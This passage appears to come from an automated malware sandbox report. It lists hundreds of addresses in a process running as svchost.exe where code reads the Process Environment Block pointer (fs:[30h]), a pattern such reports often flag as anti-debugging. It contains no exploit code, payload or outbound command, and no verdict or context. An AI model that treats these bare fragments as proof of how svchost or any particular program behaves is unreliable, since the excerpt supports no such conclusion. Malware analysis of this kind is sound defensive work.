            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CD437C mov eax, dword ptr fs:[00000030h]9_2_03CD437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C37370 mov eax, dword ptr fs:[00000030h]9_2_03C37370
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB930B mov eax, dword ptr fs:[00000030h]9_2_03CB930B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C6A30B mov eax, dword ptr fs:[00000030h]9_2_03C6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2C310 mov ecx, dword ptr fs:[00000030h]9_2_03C2C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C50310 mov ecx, dword ptr fs:[00000030h]9_2_03C50310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CF132D mov eax, dword ptr fs:[00000030h]9_2_03CF132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C5F32A mov eax, dword ptr fs:[00000030h]9_2_03C5F32A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C27330 mov eax, dword ptr fs:[00000030h]9_2_03C27330
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]9_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C5B2C0 mov eax, dword ptr fs:[00000030h]9_2_03C5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C392C5 mov eax, dword ptr fs:[00000030h]9_2_03C392C5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2B2D3 mov eax, dword ptr fs:[00000030h]9_2_03C2B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C5F2D0 mov eax, dword ptr fs:[00000030h]9_2_03C5F2D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CE12ED mov eax, dword ptr fs:[00000030h]9_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C402E1 mov eax, dword ptr fs:[00000030h]9_2_03C402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03D052E2 mov eax, dword ptr fs:[00000030h]9_2_03D052E2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CEF2F8 mov eax, dword ptr fs:[00000030h]9_2_03CEF2F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C292FF mov eax, dword ptr fs:[00000030h]9_2_03C292FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C6E284 mov eax, dword ptr fs:[00000030h]9_2_03C6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB0283 mov eax, dword ptr fs:[00000030h]9_2_03CB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03D05283 mov eax, dword ptr fs:[00000030h]9_2_03D05283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C6329E mov eax, dword ptr fs:[00000030h]9_2_03C6329E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C402A0 mov eax, dword ptr fs:[00000030h]9_2_03C402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C452A0 mov eax, dword ptr fs:[00000030h]9_2_03C452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CF92A6 mov eax, dword ptr fs:[00000030h]9_2_03CF92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CC62A0 mov eax, dword ptr fs:[00000030h]9_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CC62A0 mov ecx, dword ptr fs:[00000030h]9_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CC72A0 mov eax, dword ptr fs:[00000030h]9_2_03CC72A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB92BC mov eax, dword ptr fs:[00000030h]9_2_03CB92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB92BC mov ecx, dword ptr fs:[00000030h]9_2_03CB92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C29240 mov eax, dword ptr fs:[00000030h]9_2_03C29240
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C6724D mov eax, dword ptr fs:[00000030h]9_2_03C6724D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2A250 mov eax, dword ptr fs:[00000030h]9_2_03C2A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CEB256 mov eax, dword ptr fs:[00000030h]9_2_03CEB256
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C36259 mov eax, dword ptr fs:[00000030h]9_2_03C36259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C34260 mov eax, dword ptr fs:[00000030h]9_2_03C34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CFD26B mov eax, dword ptr fs:[00000030h]9_2_03CFD26B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2826B mov eax, dword ptr fs:[00000030h]9_2_03C2826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C59274 mov eax, dword ptr fs:[00000030h]9_2_03C59274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C71270 mov eax, dword ptr fs:[00000030h]9_2_03C71270
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CE0274 mov eax, dword ptr fs:[00000030h]9_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C67208 mov eax, dword ptr fs:[00000030h]9_2_03C67208
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C67208 mov eax, dword ptr fs:[00000030h]9_2_03C67208
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03D05227 mov eax, dword ptr fs:[00000030h]9_2_03D05227
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2823B mov eax, dword ptr fs:[00000030h]9_2_03C2823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CF61C3 mov eax, dword ptr fs:[00000030h]9_2_03CF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CF61C3 mov eax, dword ptr fs:[00000030h]9_2_03CF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C6D1D0 mov eax, dword ptr fs:[00000030h]9_2_03C6D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C6D1D0 mov ecx, dword ptr fs:[00000030h]9_2_03C6D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03D051CB mov eax, dword ptr fs:[00000030h]9_2_03D051CB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C551EF mov eax, dword ptr fs:[00000030h]9_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C551EF mov eax, dword ptr fs:[00000030h]9_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C551EF mov eax, dword ptr fs:[00000030h]9_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C551EF mov eax, dword ptr fs:[00000030h]9_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C551EF mov eax, dword ptr fs:[00000030h]9_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C551EF mov eax, dword ptr fs:[00000030h]9_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C551EF mov eax, dword ptr fs:[00000030h]9_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C551EF mov eax, dword ptr fs:[00000030h]9_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C551EF mov eax, dword ptr fs:[00000030h]9_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C551EF mov eax, dword ptr fs:[00000030h]9_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C551EF mov eax, dword ptr fs:[00000030h]9_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C551EF mov eax, dword ptr fs:[00000030h]9_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C551EF mov eax, dword ptr fs:[00000030h]9_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C351ED mov eax, dword ptr fs:[00000030h]9_2_03C351ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03D061E5 mov eax, dword ptr fs:[00000030h]9_2_03D061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C601F8 mov eax, dword ptr fs:[00000030h]9_2_03C601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C70185 mov eax, dword ptr fs:[00000030h]9_2_03C70185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CEC188 mov eax, dword ptr fs:[00000030h]9_2_03CEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CEC188 mov eax, dword ptr fs:[00000030h]9_2_03CEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB019F mov eax, dword ptr fs:[00000030h]9_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB019F mov eax, dword ptr fs:[00000030h]9_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB019F mov eax, dword ptr fs:[00000030h]9_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB019F mov eax, dword ptr fs:[00000030h]9_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2A197 mov eax, dword ptr fs:[00000030h]9_2_03C2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2A197 mov eax, dword ptr fs:[00000030h]9_2_03C2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2A197 mov eax, dword ptr fs:[00000030h]9_2_03C2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C87190 mov eax, dword ptr fs:[00000030h]9_2_03C87190
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CE11A4 mov eax, dword ptr fs:[00000030h]9_2_03CE11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CE11A4 mov eax, dword ptr fs:[00000030h]9_2_03CE11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CE11A4 mov eax, dword ptr fs:[00000030h]9_2_03CE11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CE11A4 mov eax, dword ptr fs:[00000030h]9_2_03CE11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C4B1B0 mov eax, dword ptr fs:[00000030h]9_2_03C4B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03D05152 mov eax, dword ptr fs:[00000030h]9_2_03D05152
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CC4144 mov eax, dword ptr fs:[00000030h]9_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CC4144 mov eax, dword ptr fs:[00000030h]9_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CC4144 mov ecx, dword ptr fs:[00000030h]9_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CC4144 mov eax, dword ptr fs:[00000030h]9_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CC4144 mov eax, dword ptr fs:[00000030h]9_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C29148 mov eax, dword ptr fs:[00000030h]9_2_03C29148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C29148 mov eax, dword ptr fs:[00000030h]9_2_03C29148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C29148 mov eax, dword ptr fs:[00000030h]9_2_03C29148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C29148 mov eax, dword ptr fs:[00000030h]9_2_03C29148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C37152 mov eax, dword ptr fs:[00000030h]9_2_03C37152
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2C156 mov eax, dword ptr fs:[00000030h]9_2_03C2C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C36154 mov eax, dword ptr fs:[00000030h]9_2_03C36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C36154 mov eax, dword ptr fs:[00000030h]9_2_03C36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F172 mov eax, dword ptr fs:[00000030h]9_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F172 mov eax, dword ptr fs:[00000030h]9_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F172 mov eax, dword ptr fs:[00000030h]9_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F172 mov eax, dword ptr fs:[00000030h]9_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F172 mov eax, dword ptr fs:[00000030h]9_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F172 mov eax, dword ptr fs:[00000030h]9_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F172 mov eax, dword ptr fs:[00000030h]9_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F172 mov eax, dword ptr fs:[00000030h]9_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F172 mov eax, dword ptr fs:[00000030h]9_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F172 mov eax, dword ptr fs:[00000030h]9_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F172 mov eax, dword ptr fs:[00000030h]9_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F172 mov eax, dword ptr fs:[00000030h]9_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F172 mov eax, dword ptr fs:[00000030h]9_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F172 mov eax, dword ptr fs:[00000030h]9_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F172 mov eax, dword ptr fs:[00000030h]9_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F172 mov eax, dword ptr fs:[00000030h]9_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F172 mov eax, dword ptr fs:[00000030h]9_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F172 mov eax, dword ptr fs:[00000030h]9_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F172 mov eax, dword ptr fs:[00000030h]9_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F172 mov eax, dword ptr fs:[00000030h]9_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F172 mov eax, dword ptr fs:[00000030h]9_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CC9179 mov eax, dword ptr fs:[00000030h]9_2_03CC9179
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CDA118 mov ecx, dword ptr fs:[00000030h]9_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CDA118 mov eax, dword ptr fs:[00000030h]9_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CDA118 mov eax, dword ptr fs:[00000030h]9_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CDA118 mov eax, dword ptr fs:[00000030h]9_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CF0115 mov eax, dword ptr fs:[00000030h]9_2_03CF0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C60124 mov eax, dword ptr fs:[00000030h]9_2_03C60124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C31131 mov eax, dword ptr fs:[00000030h]9_2_03C31131
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C31131 mov eax, dword ptr fs:[00000030h]9_2_03C31131
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2B136 mov eax, dword ptr fs:[00000030h]9_2_03C2B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2B136 mov eax, dword ptr fs:[00000030h]9_2_03C2B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2B136 mov eax, dword ptr fs:[00000030h]9_2_03C2B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2B136 mov eax, dword ptr fs:[00000030h]9_2_03C2B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C470C0 mov eax, dword ptr fs:[00000030h]9_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C470C0 mov ecx, dword ptr fs:[00000030h]9_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C470C0 mov ecx, dword ptr fs:[00000030h]9_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C470C0 mov eax, dword ptr fs:[00000030h]9_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C470C0 mov ecx, dword ptr fs:[00000030h]9_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C470C0 mov ecx, dword ptr fs:[00000030h]9_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C470C0 mov eax, dword ptr fs:[00000030h]9_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C470C0 mov eax, dword ptr fs:[00000030h]9_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C470C0 mov eax, dword ptr fs:[00000030h]9_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C470C0 mov eax, dword ptr fs:[00000030h]9_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C470C0 mov eax, dword ptr fs:[00000030h]9_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C470C0 mov eax, dword ptr fs:[00000030h]9_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C470C0 mov eax, dword ptr fs:[00000030h]9_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C470C0 mov eax, dword ptr fs:[00000030h]9_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C470C0 mov eax, dword ptr fs:[00000030h]9_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C470C0 mov eax, dword ptr fs:[00000030h]9_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C470C0 mov eax, dword ptr fs:[00000030h]9_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C470C0 mov eax, dword ptr fs:[00000030h]9_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03D050D9 mov eax, dword ptr fs:[00000030h]9_2_03D050D9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB20DE mov eax, dword ptr fs:[00000030h]9_2_03CB20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C590DB mov eax, dword ptr fs:[00000030h]9_2_03C590DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C550E4 mov eax, dword ptr fs:[00000030h]9_2_03C550E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C550E4 mov ecx, dword ptr fs:[00000030h]9_2_03C550E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2A0E3 mov ecx, dword ptr fs:[00000030h]9_2_03C2A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C380E9 mov eax, dword ptr fs:[00000030h]9_2_03C380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2C0F0 mov eax, dword ptr fs:[00000030h]9_2_03C2C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C720F0 mov ecx, dword ptr fs:[00000030h]9_2_03C720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C3208A mov eax, dword ptr fs:[00000030h]9_2_03C3208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2D08D mov eax, dword ptr fs:[00000030h]9_2_03C2D08D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C35096 mov eax, dword ptr fs:[00000030h]9_2_03C35096
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C5D090 mov eax, dword ptr fs:[00000030h]9_2_03C5D090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C5D090 mov eax, dword ptr fs:[00000030h]9_2_03C5D090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C6909C mov eax, dword ptr fs:[00000030h]9_2_03C6909C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CF60B8 mov eax, dword ptr fs:[00000030h]9_2_03CF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CF60B8 mov ecx, dword ptr fs:[00000030h]9_2_03CF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C32050 mov eax, dword ptr fs:[00000030h]9_2_03C32050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CD705E mov ebx, dword ptr fs:[00000030h]9_2_03CD705E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CD705E mov eax, dword ptr fs:[00000030h]9_2_03CD705E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C5B052 mov eax, dword ptr fs:[00000030h]9_2_03C5B052
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03D05060 mov eax, dword ptr fs:[00000030h]9_2_03D05060
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C41070 mov eax, dword ptr fs:[00000030h]9_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C41070 mov ecx, dword ptr fs:[00000030h]9_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C41070 mov eax, dword ptr fs:[00000030h]9_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C41070 mov eax, dword ptr fs:[00000030h]9_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C41070 mov eax, dword ptr fs:[00000030h]9_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C41070 mov eax, dword ptr fs:[00000030h]9_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C41070 mov eax, dword ptr fs:[00000030h]9_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C41070 mov eax, dword ptr fs:[00000030h]9_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C41070 mov eax, dword ptr fs:[00000030h]9_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C41070 mov eax, dword ptr fs:[00000030h]9_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C41070 mov eax, dword ptr fs:[00000030h]9_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C41070 mov eax, dword ptr fs:[00000030h]9_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C41070 mov eax, dword ptr fs:[00000030h]9_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C5C073 mov eax, dword ptr fs:[00000030h]9_2_03C5C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C4E016 mov eax, dword ptr fs:[00000030h]9_2_03C4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C4E016 mov eax, dword ptr fs:[00000030h]9_2_03C4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C4E016 mov eax, dword ptr fs:[00000030h]9_2_03C4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C4E016 mov eax, dword ptr fs:[00000030h]9_2_03C4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2A020 mov eax, dword ptr fs:[00000030h]9_2_03C2A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2C020 mov eax, dword ptr fs:[00000030h]9_2_03C2C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CF903E mov eax, dword ptr fs:[00000030h]9_2_03CF903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CF903E mov eax, dword ptr fs:[00000030h]9_2_03CF903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CF903E mov eax, dword ptr fs:[00000030h]9_2_03CF903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CF903E mov eax, dword ptr fs:[00000030h]9_2_03CF903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C3C7C0 mov eax, dword ptr fs:[00000030h]9_2_03C3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C357C0 mov eax, dword ptr fs:[00000030h]9_2_03C357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C357C0 mov eax, dword ptr fs:[00000030h]9_2_03C357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C357C0 mov eax, dword ptr fs:[00000030h]9_2_03C357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C3D7E0 mov ecx, dword ptr fs:[00000030h]9_2_03C3D7E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C527ED mov eax, dword ptr fs:[00000030h]9_2_03C527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C527ED mov eax, dword ptr fs:[00000030h]9_2_03C527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C527ED mov eax, dword ptr fs:[00000030h]9_2_03C527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C347FB mov eax, dword ptr fs:[00000030h]9_2_03C347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C347FB mov eax, dword ptr fs:[00000030h]9_2_03C347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CEF78A mov eax, dword ptr fs:[00000030h]9_2_03CEF78A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB97A9 mov eax, dword ptr fs:[00000030h]9_2_03CB97A9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CBF7AF mov eax, dword ptr fs:[00000030h]9_2_03CBF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CBF7AF mov eax, dword ptr fs:[00000030h]9_2_03CBF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CBF7AF mov eax, dword ptr fs:[00000030h]9_2_03CBF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CBF7AF mov eax, dword ptr fs:[00000030h]9_2_03CBF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CBF7AF mov eax, dword ptr fs:[00000030h]9_2_03CBF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03D037B6 mov eax, dword ptr fs:[00000030h]9_2_03D037B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C307AF mov eax, dword ptr fs:[00000030h]9_2_03C307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C5D7B0 mov eax, dword ptr fs:[00000030h]9_2_03C5D7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F7BA mov eax, dword ptr fs:[00000030h]9_2_03C2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F7BA mov eax, dword ptr fs:[00000030h]9_2_03C2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F7BA mov eax, dword ptr fs:[00000030h]9_2_03C2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F7BA mov eax, dword ptr fs:[00000030h]9_2_03C2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F7BA mov eax, dword ptr fs:[00000030h]9_2_03C2F7BA
